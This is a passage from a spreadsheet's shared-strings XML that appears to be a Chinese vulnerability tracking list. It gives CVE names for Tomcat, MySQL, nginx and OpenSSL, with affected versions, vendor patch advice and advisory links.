https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2022_00071&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Apache Tomcat 跨站脚本漏洞(CVE-2022-34305)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.50版本(含)到8.5.81版本(含),9.0.30版本(含)到9.0.64版本(含),10.0.0-M1版本(含)到10.0.22版本(含),10.1.0-M1版本(含)到10.1.0-M16版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 请关注厂商公告，下载修复版本进行升级进行防护，下载链接：https://hadoop.apache.org/releases.html https://tomcat.apache.org/download-10.cgi https://tomcat.apache.org/download-9.cgi https://tomcat.apache.org/download-8.cgi</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3633)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1453
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3635)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.56版本(含),5.6.0版本(含)到5.6.36版本(含),5.7.0版本(含)到5.7.18版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1445
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://www.debian.org/security/2017/dsa-3922</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.18版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1431
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1369
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3648)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1290
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886
https://www.debian.org/security/2017/dsa-3922</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3652)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1275
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886
https://www.debian.org/security/2017/dsa-3922</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-3653)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1270
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886
https://access.redhat.com/errata/RHSA-2018:2439
https://access.redhat.com/errata/RHSA-2018:0279
https://www.debian.org/security/2017/dsa-3922
https://www.debian.org/security/2017/dsa-3944
https://access.redhat.com/errata/RHSA-2018:0574
https://www.debian.org/security/2017/dsa-3955
https://access.redhat.com/errata/RHSA-2018:2729</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.19版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-793
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10294)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.37版本(含),5.7.0版本(含)到5.7.19版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-814
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB远程安全漏洞(CVE-2017-10365)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-748
https://security.netapp.com/advisory/ntap-20171019-0002/
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2761)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.59版本(含),5.6.0版本(含)到5.6.39版本(含),5.7.0版本(含)到5.7.21版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1259
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
https://www.debian.org/security/2018/dsa-4176
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2018:1254
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://access.redhat.com/errata/RHSA-2018:2439
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2018:2729
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2781)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1240</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2813)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1208
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
https://www.debian.org/security/2018/dsa-4176
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2018:1254
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://access.redhat.com/errata/RHSA-2018:2439
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2018:2729
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2817)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1204
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
https://www.debian.org/security/2018/dsa-4176
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2018:1254
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://access.redhat.com/errata/RHSA-2018:2439
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2018:2729
https://security.gentoo.org/glsa/201908-24
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2819)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1202
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
https://www.debian.org/security/2018/dsa-4176
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2018:1254
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://access.redhat.com/errata/RHSA-2018:2439
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2018:2729
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2775)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.21版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1246
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2775</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2819)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.44版本(含),5.7.0版本(含)到5.7.26版本(含),8.0.0版本(含)到8.0.16版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-912
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://support.f5.com/csp/article/K02585438
https://access.redhat.com/errata/RHSA-2019:2484
https://usn.ubuntu.com/4070-1/
https://access.redhat.com/errata/RHSA-2019:2511
https://access.redhat.com/errata/RHSA-2019:2511
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://nvd.nist.gov/vuln/detail/CVE-2019-2819
https://www.auscert.org.au/bulletins/ESB-2019.3849/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://packetstormsecurity.com/files/153742/Ubuntu-Security-Notice-USN-4070-1.html
https://www.ibm.com/support/pages/node/1078971
https://www.auscert.org.au/bulletins/ESB-2019.2784/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2993)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.27版本(含),8.0.0版本(含)到8.0.17版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-987
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7X5D3O4TOQ57KL5FLQEXH2JB2UQYHCUZ/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6DTUCXX5XXPNPFV2PHP6IESGTCFMZOFP/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKCJLNRK6RHFAHV7ZFD3XO7HNSBU3XOL/
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://nvd.nist.gov/vuln/detail/CVE-2019-2993
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2946)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1003
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7X5D3O4TOQ57KL5FLQEXH2JB2UQYHCUZ/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6DTUCXX5XXPNPFV2PHP6IESGTCFMZOFP/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKCJLNRK6RHFAHV7ZFD3XO7HNSBU3XOL/
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://nvd.nist.gov/vuln/detail/CVE-2019-2946
https://packetstormsecurity.com/files/155381/Ubuntu-Security-Notice-USN-4195-1.html
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2914)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1007
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7X5D3O4TOQ57KL5FLQEXH2JB2UQYHCUZ/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6DTUCXX5XXPNPFV2PHP6IESGTCFMZOFP/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKCJLNRK6RHFAHV7ZFD3XO7HNSBU3XOL/
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://nvd.nist.gov/vuln/detail/CVE-2019-2914
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>nginx 安全漏洞(CVE-2019-9511)</t>
  </si>
  <si>
    <t>影响nginx:1.9.5版本(含)到1.16.1版本,1.17.0版本(含)到1.17.2版本(含)</t>
  </si>
  <si>
    <t>下载更高版本进行升级，下载链接：http://nginx.org/en/download.html，升级方法链接：https://blog.csdn.net/jiahao1186/article/details/122230459</t>
  </si>
  <si>
    <t>http://nginx.org/en/download.html
https://blog.csdn.net/jiahao1186/article/details/122230459</t>
  </si>
  <si>
    <t>nginx 安全漏洞(CVE-2019-9516)</t>
  </si>
  <si>
    <t>ips-12031105（无效）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://http2.github.io/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201908-938
https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md</t>
  </si>
  <si>
    <t>nginx 安全漏洞（CVE-2018-16844）</t>
  </si>
  <si>
    <t>影响nginx: 1.9.5版本(含)到1.14.1版本,1.15版本(含)到1.15.6版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://mailman.nginx.org/pipermail/nginx-announce/2018/000220.html?_ga=2.143807029.1839563140.1541529087-1530719350.1541529087</t>
  </si>
  <si>
    <t>http://mailman.nginx.org/pipermail/nginx-announce/2018/000220.html?_ga=2.143807029.1839563140.1541529087-1530719350.1541529087</t>
  </si>
  <si>
    <t>nginx 安全漏洞（CVE-2018-16845）</t>
  </si>
  <si>
    <t>影响nginx:1.0.7版本(含)到1.0.16版本,1.1.3版本(含)到1.15.6版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://mailman.nginx.org/pipermail/nginx-announce/2018/000221.html</t>
  </si>
  <si>
    <t>Nginx 未授权访问漏洞(CVE-2019-20372)</t>
  </si>
  <si>
    <t>Nginx&lt;1.17.7</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： http://nginx.org/en/CHANGES</t>
  </si>
  <si>
    <t>https://usn.ubuntu.com/4235-1/
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_11519&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>NGINX MP4 模块漏洞(CVE-2024-7347)</t>
  </si>
  <si>
    <t>影响nginx:1.5.13版本(含)到1.26.2版本</t>
  </si>
  <si>
    <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
  </si>
  <si>
    <t>https://my.f5.com/manage/s/article/K000140529</t>
  </si>
  <si>
    <t>HTTP/2拒绝服务漏洞（CVE-2023-44487）</t>
  </si>
  <si>
    <t>影响nginx: 1.9.5版本(含)至1.25.2版本(含)</t>
  </si>
  <si>
    <t>https://nginx.org/en/download.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞 (CVE-2019-2730)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.18版本(含),5.6.0版本(含)到5.6.44版本(含)</t>
  </si>
  <si>
    <t>http://www.oracle.com/index.html
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-949
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2730</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2752)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.47版本(含),5.7.0版本(含)到5.7.27版本(含),8.0.0版本(含)到8.0.17版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2806)</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB 安全漏洞(CVE-2020-2922)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.47版本(含),5.7.0版本(含)到5.7.29版本(含),8.0.0版本(含)到8.0.18版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14547)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-718
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14790)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.31版本(含),8.0.0版本(含)到8.0.21版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-1003</t>
  </si>
  <si>
    <t>Oracle MySQL Server 信息泄露漏洞(CVE-2019-2924)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.45版本(含),5.7.0版本(含)到5.7.27版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1001
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://nvd.nist.gov/vuln/detail/CVE-2019-2924
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2589)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.28版本(含),8.0.0版本(含)到8.0.18版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://www.oracle.com/security-alerts/cpujan2020.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202011-1544
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2021-2060)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.50版本(含),5.7.0版本(含)到5.7.32版本(含),8.0.0版本(含)到8.0.22版本(含)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2021verbose.html
https://nvd.nist.gov/vuln/detail/CVE-2021-2060</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB 安全漏洞(CVE-2021-2022)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle----目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujan2021.htmlMariadb------目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://mariadb.com/kb/en/security/</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB 访问控制错误漏洞(CVE-2021-2032)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.32版本(含),8.0.0版本(含)到8.0.22版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2019-5482)</t>
  </si>
  <si>
    <t>ips-11040022（有效）</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.28版本(含),8.0.0版本(含)到8.0.18版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2020.html
https://usn.ubuntu.com/4129-2/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2202)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.33版本(含),8.0.0版本(含)到8.0.23版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2021.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2307)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2180)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2194)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2021.html
https://ubuntu.com/security/notices/USN-5022-3</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2169)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2021.html
https://ubuntu.com/security/notices/USN-4952-1</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞（CVE-2021-21622）</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2017-3737)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.38版本(含),5.7.0版本(含)到5.7.20版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>OpenSSL 拒绝服务漏洞（CVE-2018-0739）</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.40版本(含),5.7.0版本(含)到5.7.22版本(含),8.0.0版本(含)到8.0.11版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:OpenSSL Project---------------OpenSSL Project已经为此发布了一个安全公告（20180327）以及相应补丁:20180327：OpenSSL Security Advisory [27 Mar 2018]链接：https://www.openssl.org/news/secadv/20180327.txt</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-1559）</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.15版本(含),5.7.0版本(含)到5.7.25版本(含),5.6.0版本(含)到5.6.43版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpuapr2019-5072813）以及相应补丁:cpuapr2019-5072813：Oracle Critical Patch Update Advisory - April 2019链接：https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server InnoDB 安全漏洞(CVE-2020-14775)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-971</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server: Security: LDAP Auth 安全漏洞(CVE-2020-14771)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-930
https://nvd.nist.gov/vuln/detail/CVE-2020-14771
https://www.oracle.com/security-alerts/cpuoct2020.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14771
https://www.cnvd.org.cn/flaw/show/CNVD-2021-00832</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3649)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1281
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3634)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1446
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1433
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1427
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3643)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1362
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3644)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1360
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1357
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
